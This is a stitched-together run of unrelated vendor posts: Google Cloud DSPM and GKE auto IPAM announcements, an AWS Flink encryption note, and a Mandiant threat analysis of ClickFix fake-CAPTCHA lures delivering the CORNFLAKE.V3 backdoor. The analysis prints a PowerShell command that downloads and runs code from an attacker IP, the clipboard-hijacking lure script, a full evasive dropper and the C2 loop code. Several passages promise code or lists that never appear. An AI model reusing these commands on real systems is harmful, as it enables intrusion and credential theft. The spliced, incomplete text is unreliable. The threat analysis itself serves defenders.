There are four key concerns that organizations should understand for robust data security: where sensitive data resides, how it’s used, what controls can secure it, and the monitoring tools available to provide evidence for compliance. Our new Data Security Posture Management (DSPM) offering, now in preview, provides end-to-end governance for data security, privacy, and compliance.
DSPM capabilities include differentiating advanced data controls that match security, privacy, and compliance requirements and align with business needs. Available as part of Security Command Center, this Google Cloud-native solution can help reduce tooling complexity, and provides native platform experience.
DSPM starts with a data map that offers a bird’s-eye view of data across your Google Cloud environment, its sensitivity level, and its default security posture. Discovery helps you apply policies to monitor and secure that data, allowing curated controls to be matched with your sensitive data needs.
With Google Cloud DSPM, security and compliance teams can:
Discover data: DSPM provides comprehensive visibility into your data estate. It automatically discovers data assets across your Google Cloud environment and uses sensitivity labels from Sensitive Data Protection to help you understand what data you have and where it resides.
Assess risk: DSPM evaluates your current data security posture against Google Cloud’s recommended best practices, and can help identify potential vulnerabilities and misconfigurations.
Protect data: DSPM deploys data security frameworks by mapping security and compliance requirements to control policies, and can help you monitor them in near-real time.
Simplify compliance: DSPM can audit data against relevant compliance frameworks, help you pinpoint gaps, and generate detailed, evidence-backed compliance reports. DSPM can also help assess compliance with HIPAA, GDPR, and PCI DSS.
A visual overview of Google Cloud’s Data Security Posture Management solution.
How advanced DSPM controls help with security and compliance requirements
Security teams can get started by identifying sensitive data in their organization’s Google Cloud environment, and mapping desired security and compliance outcomes to specific data controls. To make this process easier, DSPM offers advanced controls, such as data access governance, flow governance, data protection, and data deletion controls to meet security and compliance outcomes.
Currently, these controls can be applied in detective mode on data boundaries, including organization, folder, and project. You can also use Google Cloud Sensitive Data Protection (SDP) to scan for specific types of sensitive data.
Applying advanced data controls to protect data.
Data access governance: Using the data access governance control, you can govern access to sensitive data and restrict access, in detective mode, to approved principals.
For example, an organization that needs governance around customer billing data can create a policy to allow only the fraud detection team to access sensitive customer billing information, and apply that control policy across sensitive data. Once applied, the policy will follow the data and surface any non-compliant access events.
Flow governance: Using data flow control, you can restrict how data is moved across country boundaries in detective mode, to ensure that sensitive customer data is not moved outside a country boundary. As an example, let’s consider an organization with operations in a specific country that has a compliance requirement to not move customer data outside the country’s geographic boundary. With data flow governance, the organization can create a policy to only allow flow of data within that country, and apply that policy to sensitive data. Once applied, the control will surface any non-compliant read operations from outside the allowed geographic boundary.
Data protection: Data protection controls can help manage the encryption key configuration, such as enforcing customer-managed encryption keys (CMEK). You can create a policy that enforces CMEK on the keys protecting sensitive data.
Data deletion: Using data deletion controls, you can manage the maximum duration that the data will be retained. You can create a policy with an allowed maximum retention period, and apply it to sensitive data.
Help shape the future of data security
We’re inviting security and compliance teams to be among the first to experience the power of Google Cloud DSPM. As part of the DSPM preview, organizations can:
Activate DSPM and begin evaluating its capabilities for specific business needs. For a detailed guide, please refer to the user guide.
Join the Technical Advisory Council and Customer Design Panels to provide valuable feedback that can influence DSPM development.
Work with Google Cloud experts to optimize their data security strategy and ensure a successful implementation.
For further questions, contact your Google Cloud account team, or send us your feedback at dspm-pm@google.com.
Managing IP addresses in Kubernetes can be a complex and daunting task — but a crucial one. In Google Kubernetes Engine (GKE), it’s important that you manage IP addresses effectively, given the resource-constrained IPv4 address space. Sub-optimal configurations can lead to:
IP inefficiency: Poor utilization of the limited IPv4 address space
Complexity: Significant administrative overhead to plan and allocate IP addresses
Errors: Increased risk of hitting IP_SPACE_EXHAUSTED errors, which halt cluster scaling and application deployments
To help, we are pleased to announce the public preview of a new feature designed to simplify IP address management (IPAM) and improve IP efficiency in your GKE clusters: GKE auto IPAM.
Simplified and efficient IP management
GKE auto IPAM simplifies IPAM by dynamically allocating and/or de-allocating IP address ranges for nodes and pods as your cluster grows. This eliminates the need for large, potentially wasteful, upfront IP reservations and manual intervention during cluster scaling.
Benefits of GKE auto IPAM
Optimize resource allocation and enhance IP efficiency: Start with smaller IP ranges and let auto IPAM seamlessly expand them as needed, helping to ensure efficient utilization of your valuable IPv4 address space.
Scale with confidence and prevent IP exhaustion: Minimize your chances of running out of IPs. Auto IPAM proactively manages and dynamically allocates / deallocates addresses as your cluster grows, making it easy to scale.
Reduce administrative overhead: Simplify IPAM management with automated allocation and configuration, freeing up valuable time for your team — no manual intervention required.
Enable demanding workloads: Support resource-intensive applications that require rapid scaling by ensuring sufficient IP capacity is dynamically available on demand for growth and performance.
Getting started
This feature is compatible with both new and existing clusters running GKE version 1.33 or greater. Today, you can configure it with either the gcloud CLI or the API; Terraform and UI support are coming soon.
Updated cluster creation UI/UX
We’ve also overhauled the GKE cluster creation UI to make it simpler and more intuitive. The old interface buried critical IPAM settings deep in the cluster creation flow, making it difficult to discover, configure, and validate crucial network settings. Elevating IPAM and bringing it to the forefront provides a more intuitive and streamlined experience, so that you can easily and confidently define your network topology from the outset, for more robust and error-free cluster deployments.
IP address management made easy
GKE auto IPAM allows you to scale your clusters up and scale your clusters down on-demand, optimizing IP address resource allocation and reducing the administrative overhead of cluster operations. Try it today!
Amazon Managed Service for Apache Flink now supports AWS Key Management Service (KMS) Customer Managed Keys (CMK). Amazon Managed Service for Apache Flink has always provided encryption by default using AWS-owned KMS keys. Now, customers have the option to use their own Customer Managed Keys, giving them greater control over how data stored in Amazon Managed Service for Apache Flink is encrypted.
Amazon Managed Service for Apache Flink simplifies the development and operation of real-time data stream processing applications by eliminating the complexity of managing Flink infrastructure. Apache Flink is an open source framework and engine for processing data streams.
For Amazon Managed Service for Apache Flink region availability, refer to the AWS Region Table.
For detailed information about implementing Customer Managed Keys in Amazon Managed Service for Apache Flink, visit our documentation.
Straight from Mandiant Threat Defense, the “Frontline Bulletin” series brings you the latest on the most intriguing compromises we are seeing in the wild right now, equipping our community to understand and respond to the most compelling threats we observe. This edition dissects an infection involving two threat groups, UNC5518 and UNC5774, leading to the deployment of CORNFLAKE.V3.
Introduction
Since June 2024, Mandiant Threat Defense has been tracking UNC5518, a financially motivated threat cluster compromising legitimate websites to serve fake CAPTCHA verification pages. This deceptive technique, known as ClickFix, lures website visitors into executing a downloader script which initiates a malware infection chain. UNC5518 appears to partner with clients or affiliates who use access obtained by the group to deploy additional malware.
While the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518, the payloads served belong to other threat groups. UNC5518 utilizes downloader scripts that function as an access-as-a-service. Several distinct threat actors have been observed leveraging the access provided by UNC5518, including:
UNC5774: A financially motivated group known to use CORNFLAKE backdoor to deploy a variety of subsequent payloads.
UNC4108: A threat cluster with unknown motivation, observed using PowerShell to deploy various tools like VOLTMARKER and NetSupport RAT, and conducting reconnaissance.
This blog post details a campaign where Mandiant identified UNC5518 deploying a downloader that delivers CORNFLAKE.V3 malware. Mandiant attributes the CORNFLAKE.V3 samples to UNC5774, a distinct financially motivated actor that uses UNC5518’s access-as-a-service operation as an entry vector into target environments.
The CORNFLAKE Family
CORNFLAKE.V3 is a backdoor, observed in two variants written in JavaScript or PHP (the PHP variant), that retrieves payloads via HTTP. Supported payload types include shell commands, executables, and dynamic link libraries (DLLs). Downloaded payloads are written to disk and executed. CORNFLAKE.V3 collects basic system information and sends it to a remote server via HTTP. CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers.
CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase. Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.
The original CORNFLAKE malware differed significantly from later iterations, as it was written in C. This first variant functioned as a downloader, gathering basic system information and transmitting it via TCP to a remote server. Subsequently, it would download and execute a payload.
Malware Family      | CORNFLAKE                | CORNFLAKE.V2       | CORNFLAKE.V3
Language            | C                        | JS                 | JS or PHP
Type                | Downloader               | Downloader         | Backdoor
C2 Communication    | TCP socket (XOR encoded) | HTTP (XOR encoded) | HTTP (XOR encoded)
Payload types       | DLL                      | DLL, EXE, JS, BAT  | DLL, EXE, JS, BAT, PS
Persistence         | No                       | No                 | Registry Run key

Table 1: Comparison of CORNFLAKE malware variants
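As Table 1 notes, every CORNFLAKE variant XOR-encodes its C2 traffic. The snippet below is an illustrative Python sketch of repeating-key XOR in general, not code recovered from the malware, and the key and beacon contents are invented:

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Hypothetical single-byte key for illustration only.
key = b"\x5a"
beacon = b'{"host":"WIN-EXAMPLE","user":"jdoe"}'

encoded = xor_bytes(beacon, key)   # what would travel over HTTP or TCP
decoded = xor_bytes(encoded, key)  # applying the same XOR recovers the data
assert decoded == beacon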
Figure 1: The observed CORNFLAKE.V3 (Node.js) attack lifecycle
Initial Lead
Mandiant Threat Defense responded to suspicious PowerShell activity on a host resulting in the deployment of the CORNFLAKE.V3 backdoor.
Mandiant observed that a PowerShell script was executed via the Run command using the Windows+R shortcut. Evidence of this activity was found in the HKEY_USERS\<User>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key, containing the following entry which resulted in the download and execution of the next payload:
Name: a
Value: powershell -w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"1
The RunMRU registry key stores the history of commands entered into the Windows Run (shortcut Windows+R) dialog box.
The execution of malicious scripts using the Windows+R shortcut is often indicative of users who have fallen victim to ClickFix lure pages. Users typically land on such pages as a result of benign browsing leading to interaction with search results that employ SEO poisoning or malicious ads.
Figure 2: Fake CAPTCHA verification (ClickFix) on an attacker-controlled webpage
As seen in the Figure 2, the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard by the malicious web page when the user clicked on the image. The webpage accomplished this with the following JavaScript code:
// An image with the reCAPTCHA logo is displayed on the webpage
<div class="c" id="j">
<img src="https://www.gstatic[.]com/recaptcha/api2/logo_48.png"
alt="reCAPTCHA Logo">
<span>I'm not a robot</span>
</div>
// The malicious script is saved in variable _0xC
var _0xC = "powershell -w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"1";
// When the image is clicked, the script is copied to the clipboard
document.getElementById("j").onclick = function(){
var ta = document.createElement("textarea");
ta.value = _0xC;
document.body.appendChild(ta);
ta.select();
document.execCommand("copy");
The PowerShell command copied to the clipboard is designed to download and execute a script from the remote server 138.199.161[.]141:8080/$u, where $u indicates the UNIX epoch timestamp of the download.
As a result, the PowerShell process connects to the aforementioned IP address and port with URL path 1742214432 (UNIX epoch timestamp), as shown in the following HTTP GET request:
GET /1742214432 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US)
WindowsPowerShell/5.1.19041.5486
Host: 138.199.161[.]141:8080
Connection: Keep-Alive
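The $u value in that command is simply the current UNIX time rounded down to a multiple of 16 seconds (the -band 0xfffffffffffffff0 mask clears the low four bits). A small Python illustration of the same computation, which can be useful when reconstructing which URL path a given victim would have requested:

import time

def cornflake_url_path(unix_seconds=None):
    """Reproduce the $u computation: UNIX time with the low four bits cleared."""
    ts = int(time.time()) if unix_seconds is None else unix_seconds
    return ts & 0xFFFFFFFFFFFFFFF0

# The request observed in this investigation used path /1742214432,
# which is already a multiple of 16:
assert cornflake_url_path(1742214432) == 1742214432
print(cornflake_url_path())  # the path a request made right now would use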
The following PowerShell dropper script, similar to 1742214432, was recovered from a threat-actor controlled server during the investigation of a similar CORNFLAKE.V3 compromise:
# Get computer manufacturer for evasion check.
$Manufacturer = Get-WmiObject Win32_ComputerSystem | Select-Object
-ExpandProperty Manufacturer
# Exit if running in QEMU (VM detection).
if ($Manufacturer -eq "QEMU") {
exit 0;
}
# Get memory info for evasion check.
$TotalMemoryGb =
(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB
$AvailableMemoryGb =
(Get-CimInstance Win32_OperatingSystem).FreePhysicalMemory / 1MB
$UsedMemoryGb = $TotalMemoryGb - $AvailableMemoryGb
# Exit if total memory is low or calculated "used" memory is low (possible sandbox detection).
if ($TotalMemoryGb -lt 4 -or $UsedMemoryGb -lt 1.5) {
exit 0
}
# Exit if computer name matches default pattern (possible sandbox detection).
if ($env:COMPUTERNAME -match "DESKTOP-S*") {
exit 0
}
# Pause execution briefly.
sleep 1
# Define download URL (defanged).
$ZipURL = "hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip"
# Define destination folder (AppData).
$DestinationFolder = [System.IO.Path]::Combine($env:APPDATA, "")
# Define temporary file path for download.
$ZipFile = [System.IO.Path]::Combine($env:TEMP, "downloaded.zip")
# Download the Node.js zip file.
iwr -Uri $ZipURL -OutFile $ZipFile
# Try block for file extraction using COM objects.
try {
$Shell = New-Object -ComObject Shell.Application
$ZIP = $Shell.NameSpace($ZipFile)
$Destination = $Shell.NameSpace($DestinationFolder)
# Copy/extract contents silently.
$Destination.CopyHere($ZIP.Items(), 20)
}
# Exit on any extraction error.
catch {
exit 0
}
# Update destination path to the extracted Node.js folder.
$DestinationFolder = [System.IO.Path]::Combine($DestinationFolder,
"node-v22.11.0-win-x64")
# Base64 encoded payload (large blob containing the CORNFLAKE.V3 sample).
$BASE64STRING = <Base-64 encoded CORNFLAKE.V3 sample>
# Decode the Base64 string.
$BINARYDATA = [Convert]::FromBase64String($BASE64STRING)
# Convert decoded bytes to a string (the payload code).
$StringData = [System.Text.Encoding]::UTF8.GetString($BINARYDATA)
# Path to the extracted node.exe.
$Node = [System.IO.Path]::Combine($DestinationFolder, "node.exe")
# Start node.exe to execute the decoded string data as JavaScript, hidden.
start-process -FilePath "$Node" -ArgumentList "-e `"$StringData`"" -WindowStyle Hidden
The PowerShell dropper’s execution includes multiple steps:
Check if it is running inside a virtual machine and, if true, exit
Download Node.js via HTTPS from the URL hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip, write the file to %TEMP%\downloaded.zip and extract its contents to the directory %APPDATA%\node-v22.11.0-win-x64
Base64 decode its embedded CORNFLAKE.V3 payload and execute it via the command %APPDATA%\node-v22.11.0-win-x64\node.exe -e “<base64_decoded_CORNFLAKE.v3>”
The PowerShell dropper’s anti-vm checks include checking for low system resources (total memory less than 4GB or used memory less than 1.5GB) and if the target system’s computer name matches the regular expression DESKTOP-S* or the target system’s manufacturer is QEMU.
As a result of the dropper's execution, a DNS query for the nodejs[.]org domain was made, followed by the download of an archive named downloaded.zip (MD5: e033f9800a5ba44b23b3026cf1c38c72). This archive contained the Node.js runtime environment, including its executable file node.exe, which was then extracted to %APPDATA%\node-v22.11.0-win-x64. The Node.js environment allows for the execution of JavaScript code outside of a web browser.
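Defenders who recover a downloaded.zip artifact from %TEMP% can compare it against the hash above. A quick PowerShell check might look like the following sketch; the file path is illustrative and should point at the recovered artifact:
# Compare a recovered archive against the downloaded.zip IOC from this investigation.
$suspect = Join-Path $env:TEMP 'downloaded.zip'   # illustrative path to the recovered file
$knownMd5 = 'E033F9800A5BA44B23B3026CF1C38C72'
if (Test-Path $suspect) {
    $hash = (Get-FileHash -Path $suspect -Algorithm MD5).Hash
    if ($hash -eq $knownMd5) {
        Write-Output "MD5 matches the Node.js archive IOC from this CORNFLAKE.V3 investigation."
    } else {
        Write-Output "MD5 does not match: $hash"
    }
}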
The extracted %APPDATA%\node-v22.11.0-win-x64\node.exe binary was then launched by PowerShell with the -e argument, followed by a large Node.js script: a CORNFLAKE.V3 backdoor sample.
Mandiant identified the following activities originating from the CORNFLAKE.V3 sample:
Host and AD-based reconnaissance
Persistence via Registry Run key
Credential harvesting attempts via Kerberoasting
The following process tree was observed during the investigation:
explorer.exe
↳ c:\windows\system32\windowspowershell\v1.0\powershell.exe
-w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"
↳ c:\users\<user>\appdata\roaming\node-v22.11.0-win-x64\node.exe
-e "{CORNFLAKE.V3}"
↳ c:\windows\system32\windowspowershell\v1.0\powershell.exe
-c "{Initial check and System Information Collection}"
↳ C:\Windows\System32\ARP.EXE -a
↳ C:\Windows\System32\chcp.com 65001
↳ C:\Windows\System32\systeminfo.exe
↳ C:\Windows\System32\tasklist.exe /svc
↳ c:\windows\system32\cmd.exe /d /s /c "wmic process where processid=16004 get commandline"
↳ C:\Windows\System32\cmd.exe /d /s /c "{Kerberoasting}"
↳ c:\windows\system32\cmd.exe /d /s /c "{Active Directory Reconnaissance}"
↳ c:\windows\system32\cmd.exe /d /s /c "reg add {ChromeUpdater as Persistence}"
Analysis of CORNFLAKE.V3
The CORNFLAKE.V3 sample recovered in our investigation was completely unobfuscated, which allowed us to statically analyze it in order to understand its functionality. This section describes the primary functions of the malware.
When the script initially executes, it checks the command line arguments of the node.exe process. Because the binary is initially spawned with a single argument (the script itself), this check causes the script to create a child process with 1 as an additional argument, after which the initial node.exe process exits. The child process now has three arguments, so it passes this initial check and executes the rest of the script.
This check allows the malware to ensure that only one instance of the script is executing at one time, even if it is launched multiple times due to its persistence mechanisms.
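As a side effect, the relaunched process carries the trailing 1 argument on its command line, which defenders can look for on a live host. The following rough PowerShell hunt assumes local access and may produce false positives; it is intended only as a starting point:
# Flag node.exe processes whose command line ends with the extra "1" argument
# that CORNFLAKE.V3 appends when it relaunches itself.
Get-CimInstance Win32_Process -Filter "Name = 'node.exe'" |
    Where-Object { $_.CommandLine -match '\s1\s*$' } |
    Select-Object ProcessId, ExecutablePath, CommandLine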
Following this, the malware attempts to collect system information using the following code:
This code block executes a series of PowerShell commands (or fallback CMD commands if PowerShell fails) using execSync. It gathers the script’s version, user privilege level (System, Admin, User), standard systeminfo output, running tasks/services (tasklist /svc), service details (Get-Service), available drives (Get-PSDrive), and the ARP table (arp -a).
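The original code block is not reproduced here, but the collection it performs maps to ordinary administrative commands. A rough PowerShell approximation of the information gathered, run standalone for illustration (the privilege check below is simplified to an administrator test), would be:
# Approximation of the system information the script collects (illustrative only).
$isAdmin   = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
$sysInfo   = systeminfo            # standard system information
$tasks     = tasklist /svc         # running tasks and associated services
$services  = Get-Service           # service details
$drives    = Get-PSDrive           # available drives
$arpTable  = arp -a                # ARP table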
C2 Initialization
After setting some logical constants and the command and control (C2) server IP address, the malware enters the mainloop function. The script contains two separate lists, hosts and hostsIp, both of which are used in the C2 communication logic. Initially, the mainloop function attempts to connect to a random host in the hosts list; if unable to do so, it attempts to connect to a random IP address in the hostsIp list instead. Once a connection is successfully established, the main function is called.
// Define lists of hostnames and IP addresses for the command and control server.
const hosts = ['159.69.3[.]151'];
const hostsIp = ['159.69.3[.]151'];
// Variables to manage the connection and retry logic.
let useIp = 0;
let delay = 1;
// Main loop to continuously communicate with the command and control server.
async function mainloop() {
let toHost = hosts[Math.floor(Math.random() * 1000) % hosts.length];
let toIp = hostsIp[Math.floor(Math.random() * 1000) % hostsIp.length];
while (true) {
// Wait for the specified delay.
await new Promise((resolve) => setTimeout(resolve, delay));
try {
// Attempt to communicate with the command and control server.
if (useIp < 200) {
await main(toHost, PORT_IP);
useIp = 0;
} else {
await main(toIp, PORT_IP);
useIp++;
if (useIp >= 210) useIp = 0;
}
} catch (error) {
// Handle errors during communication.
console.error('Error with HTTP request:', error.message);
toHost = hosts[Math.floor(Math.random() * 1000) %
hosts.length];
toIp = hostsIp[Math.floor(Math.random() * 1000) %
hostsIp.length];
useIp++;
delay = 1000 * 10;
continue;
}
// Set the delay for the next attempt.
delay = 1000 * 60 * 5;
}
}
C2 Communication
This function, named main, handles the main command and control logic. It takes a host and port number as arguments, and constructs the data to be sent to the C2 server. The malware sends an initial POST request to the path /init1234, which contains information about the infected system and the output of the last executed command; the contents of this request are XOR-encrypted by the enc function.
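The exact key and framing used by the enc routine are not reproduced in this post. As an illustration of how an analyst might test candidate single-byte XOR keys against a captured /init1234 request body, consider the following PowerShell sketch; the file path and key value are placeholders:
# Try a candidate single-byte XOR key against a captured request body (analysis helper).
function Invoke-XorDecode {
    param(
        [byte[]]$Data,
        [byte]$Key
    )
    $out = New-Object 'byte[]' ($Data.Length)
    for ($i = 0; $i -lt $Data.Length; $i++) {
        $out[$i] = $Data[$i] -bxor $Key
    }
    [System.Text.Encoding]::UTF8.GetString($out)
}
$body = [System.IO.File]::ReadAllBytes('C:\analysis\init1234_body.bin')   # illustrative path
Invoke-XorDecode -Data $body -Key 0x5A                                    # placeholder key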
This request is answered by the C2 with two possible responses:
ooff – the process exits
atst – the atst function is called, which establishes persistence on the host
If the response does not match one of the aforementioned two values, the malware interprets the response as a payload and parses the last byte of the response after XOR-decrypting it. The following values are accepted by the program:
Command | Type | Description
0 | EXE | The received payload is written to %APPDATA%\<random_8_chars>\<random_8_chars>.exe and launched using the Node.js child_process.spawn() function.
1 | DLL | The received payload is written to %APPDATA%\<random_8_chars>\<random_8_chars>.dll and launched as an argument to rundll32.exe using the Node.js child_process.spawn() function.
2 | JS | The received payload is launched from memory as an argument to node.exe using the Node.js child_process.spawn() function.
3 | CMD | The received payload is launched from memory as an argument to cmd.exe using the Node.js child_process.spawn() function. Additionally, the output is saved in the LastCmd variable and sent to the C2 in the next request.
4 | Other | The payload is written to %APPDATA%\<random_8_chars>\<random_8_chars>.log.
Table 2: CORNFLAKE.V3 supported payloads
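When triaging decrypted C2 responses, the command byte can be read directly off the end of the buffer. A small PowerShell helper mapping it to the types in Table 2 might look like the following; the input path is illustrative and nothing is executed:
# Classify a decrypted CORNFLAKE.V3 payload by its final byte, per Table 2 (analysis only).
$payload = [System.IO.File]::ReadAllBytes('C:\analysis\decrypted_payload.bin')   # illustrative path
$command = $payload[-1]
$types = @{ 0 = 'EXE'; 1 = 'DLL'; 2 = 'JS'; 3 = 'CMD'; 4 = 'Other (.log)' }
$label = if ($types.ContainsKey([int]$command)) { $types[[int]$command] } else { 'Unknown' }
Write-Output ("Command byte {0} -> payload type: {1}" -f $command, $label)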
Persistence
The atst function, called by main, attempts to establish persistence on the host by creating a new registry Run key value named ChromeUpdater under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
The malware uses wmic.exe to obtain the command line arguments of the currently running node.exe process. If node.exe was launched with the -e argument, like the malware does initially, the script extracts the argument after -e, which contains the full malicious script. This script is written to the <random_8_chars>.log file in the Node.js installation directory and its path is saved to the path2file variable.
If node.exe was instead launched with a file as an argument (such as during the persistence phase), the path to this file is extracted and saved to the path2file variable.
The path2file variable is then set as an argument to node.exe in the newly created ChromeUpdater registry value. This ensures that the malware executes upon user logon.
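During response, this value can be inspected and, once the referenced script file has been preserved for analysis, removed. A minimal PowerShell sketch:
# Inspect the HKCU Run key for the ChromeUpdater value used by CORNFLAKE.V3 persistence.
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$value  = Get-ItemProperty -Path $runKey -Name 'ChromeUpdater' -ErrorAction SilentlyContinue
if ($value) {
    Write-Output "ChromeUpdater persistence found: $($value.ChromeUpdater)"
    # After collecting the referenced script for analysis, the value can be removed:
    # Remove-ItemProperty -Path $runKey -Name 'ChromeUpdater'
}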
Executed Payloads
As observed in the main function, this sample can receive and execute different types of payloads from its C2 server. This section describes two payloads that were observed in our investigation.
Active Directory Reconnaissance
The first payload observed on the host was a batch script containing reconnaissance commands. The script initially determines whether the host is domain-joined; this condition determines which type of reconnaissance is executed.
Domain Joined
Query Active Directory Computer Count: Attempts to connect to Active Directory and count the total number of computer objects registered in the domain.
Display Detailed User Context: Executes whoami /all to reveal the current user’s Security Identifier (SID), domain and local group memberships, and assigned security privileges.
Enumerate Domain Trusts: Executes nltest /domain_trusts to list all domains that the current computer’s domain has trust relationships with (both incoming and outgoing).
List Domain Controllers: Executes nltest /dclist: to find and list the available Domain Controllers (DCs) for the computer’s current domain.
Query Service Principal Names (SPNs): Executes setspn -T <UserDomain> -Q */* to query for all SPNs registered in the user’s logon domain, then filters the results (Select-String) to specifically highlight SPNs potentially associated with user accounts (lines starting CN=…Users).
Not Domain Joined
Enumerate Local Groups: Uses Get-LocalGroup to list all security groups defined locally on the machine.
Enumerate Local Group Members: For each local group found, uses Get-LocalGroupMember to list the accounts (users or other groups) that are members of that group, displaying their Name and PrincipalSource (e.g., Local, MicrosoftAccount).
Kerberoasting
The second script executed is a batch script which attempts to harvest credentials via Kerberoasting. The script queries Active Directory for user accounts configured with SPNs (often an indication of a service account using user credentials). For each of these, it requests a Kerberos service ticket from which a password hash is extracted and formatted. These hashes are exfiltrated to the C2 server, where the attacker can attempt to crack them.
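On the detection side, Kerberoasting of this kind commonly surfaces as service ticket requests using RC4. The following PowerShell sketch, run on a domain controller with auditing for Kerberos service ticket operations enabled, filters Event ID 4769 for ticket encryption type 0x17; this is a common but not definitive indicator and should be correlated with the requesting account and volume:
# Hunt for potential Kerberoasting: TGS requests (Event ID 4769) using RC4 (encryption type 0x17).
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769 } -MaxEvents 5000 |
    Where-Object {
        $xml = [xml]$_.ToXml()
        $enc = ($xml.Event.EventData.Data |
                Where-Object { $_.GetAttribute('Name') -eq 'TicketEncryptionType' }).'#text'
        $enc -eq '0x17'
    } |
    Select-Object TimeCreated, Message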
Mandiant Threat Defense recently observed a new PHP-based CORNFLAKE.V3 variant which has similar functionality to the previous Node.js based iterations.
This version was dropped by an in-memory script which was executed as a result of interaction with a malicious ClickFix lure page.
The script downloads the PHP package from windows.php[.]net, writes it to disk as php.zip, and extracts its contents to the C:\Users\<User>\AppData\Roaming\php directory. The CORNFLAKE.V3 PHP sample is contained in the config.cfg file that was also dropped in the same directory and executed with the following command line arguments:
To maintain persistence on the host, this variant utilizes a registry Run key value named after a randomly chosen directory in %APPDATA% or %LOCALAPPDATA%, instead of the fixed ChromeUpdater string used in the Node.js version. To communicate with its C2, a unique path is generated for each request, unlike the static /init1234 path:
POST /ue/2&290cd148ed2f4995f099b7370437509b/fTqvlt HTTP/1.1
Host: varying-rentals-calgary-predict.trycloudflare[.]com
Connection: close
Content-Length: 39185
Content-type: application/octet-stream
Much like the Node.js version, the last byte of the received payload determines the payload type; however, these values differ in the PHP version:
Command | Type | Notes
0 | EXE | The decrypted content is saved to a temporary executable file (<rand_8_char>.exe) created in a random directory within the user’s %APPDATA% folder and executed through PowerShell as a hidden process.
1 | DLL | The decrypted content is saved as a <rand_8_char>.png file in a temporary directory within the user’s %APPDATA% folder. Subsequently, rundll32.exe is invoked to execute the downloaded file.
2 | JS | The decrypted content is saved as a <rand_8_char>.jpg file in a temporary directory within the user’s %APPDATA% folder. The script checks whether Node.js is installed. If Node.js is not found or fails to install from a hardcoded URL (http://nodejs[.]org/dist/v21.7.3/node-v21.7.3-win-x64.zip), an error message is printed. If Node.js is available, the downloaded JavaScript (.jpg) file is executed using node.exe.
3 | CMD | The decrypted data is executed as a command string via cmd.exe or powershell.exe.
4 | ACTIVE | This command reports the active_cnt value (stored in the $qRunq global variable) to the C2 server. This likely serves as a heartbeat or activity metric for the implant.
5 | AUTORUN | The malware attempts to establish persistence by adding a registry entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run that points to the script’s PHP binary and its own path.
6 | OFF | This command directly calls exit(0), which terminates the PHP script’s execution.
 | OTHER | If none of the specific commands match, the received data is saved as a .txt file in a temporary directory within the user’s %APPDATA% folder.
The JavaScript payload execution functionality was retained by implementing the download of the Node.js runtime environment inside the JS command. Other notable changes include changing the DLL and JS payload file extensions to .png and .jpg to evade detection, and the addition of the ACTIVE and AUTORUN commands. However, the main functionality of the backdoor remains unchanged despite the transition from Node.js to PHP.
These changes suggest an ongoing effort by the threat actor to refine their malware against evolving security measures.
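Because this variant’s Run value name varies per host (unlike the fixed ChromeUpdater string), hunting for its persistence is easier by examining what the Run entries point to rather than what they are called. A rough local PowerShell check covering both the PHP and Node.js variants might be:
# Flag HKCU Run values that launch php.exe or node.exe from a user-profile AppData path.
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$props  = Get-ItemProperty -Path $runKey
foreach ($name in $props.PSObject.Properties.Name) {
    $cmd = [string]$props.$name
    if ($cmd -match '(?i)appdata\\(roaming|local).*\\(php|node)\.exe') {
        Write-Output ("Suspicious Run value '{0}': {1}" -f $name, $cmd)
    }
}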
Executed Payloads
Active Directory Reconnaissance
A cmd.exe reconnaissance payload similar to the one encountered in the Node.js variant was received from the C2 server and executed. The script checks whether the machine is part of an Active Directory domain and collects the following information using PowerShell:
Domain Joined
Total count of computer accounts in AD.
Domain trust relationships.
List of all Domain Controllers.
Members of the “Domain Admins” group.
User accounts configured with a Service Principal Name (SPN).
All local groups and their members.
Current user name, SID, local group memberships, and security privileges.
Not Domain Joined
All local groups and their members.
Current user name, SID, local group memberships, and security privileges.
WINDYTWIST.SEA Backdoor
Following the interaction with its C2 server, a DLL payload (corresponding to command 1) was received, written to disk as C:\Users\<User>\AppData\Roaming\Shift19434078G0ZrQi.png, and executed using rundll32. This file was a WINDYTWIST.SEA backdoor implant configured with the following C2 servers:
This implant is a C version of the Java WINDYTWIST backdoor, which supports relaying TCP traffic, providing a reverse shell, executing commands, and deleting itself. In previous intrusions, Mandiant observed WINDYTWIST.SEA samples attempting to move laterally in the network of the infected machine.
The following process tree was observed during the infection:
This investigation highlights the collaborative nature of modern cyber threats, where UNC5518 leverages compromised websites and deceptive ClickFix lures to gain initial access. This access is then utilized by other actors like UNC5774, who deploy versatile malware such as the CORNFLAKE.V3 backdoor. The subsequent reconnaissance and credential harvesting activities we observed indicate that the attackers intend to move laterally and expand their foothold in the environment.
